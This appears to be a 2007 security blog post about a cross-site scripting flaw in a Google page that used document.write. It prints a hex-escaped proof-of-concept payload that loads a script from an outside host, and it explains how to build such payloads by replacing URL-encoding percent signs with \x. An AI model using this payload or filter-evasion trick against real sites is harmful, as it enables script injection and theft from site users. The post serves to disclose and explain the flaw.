At 12:57 this morning Hong posted a working exploit in Google based on some work he did on the 13th, finding another XSS vulnerability in Google. This one is a little more interesting than most, because it uses a basic mis-understanding of what can be done with document.write. Google’s engineers were smart enough to close off the obvious quotes and angle brackets, but because they are inside a document.write you can use escape chars to build text that represents the output in question. Here is an example PoC:

\x22\x3e\x3c\x2fiframe\x3e\x3cscript\x20src\x3dhttp\x3a\x2f\x2fha.ckers.org\x2fxss.js\x3e\x3c\x2fscript\x3e

As you can see, the \x represents a hex character. So basically pretend that you are going to URL encode something and then do a replace. Anytime you see “%” replace it with “\x”. In this way no angle brackets, no quotes, equals signs or any other character other than a backslash and alpha numerics are required for the vector to fire. Pretty tricky stuff, especially since most people don’t understand what can be done inside a document.write, including Google’s developers. Nice find, Hong and nice demonstration of what is possible inside a document.write. Time to protect yourself from backslashes too, I’d say.

This entry was posted on Monday, January 15th, 2007 at 11:17 am and is filed under XSS, Webappsec. You can leave a response as well.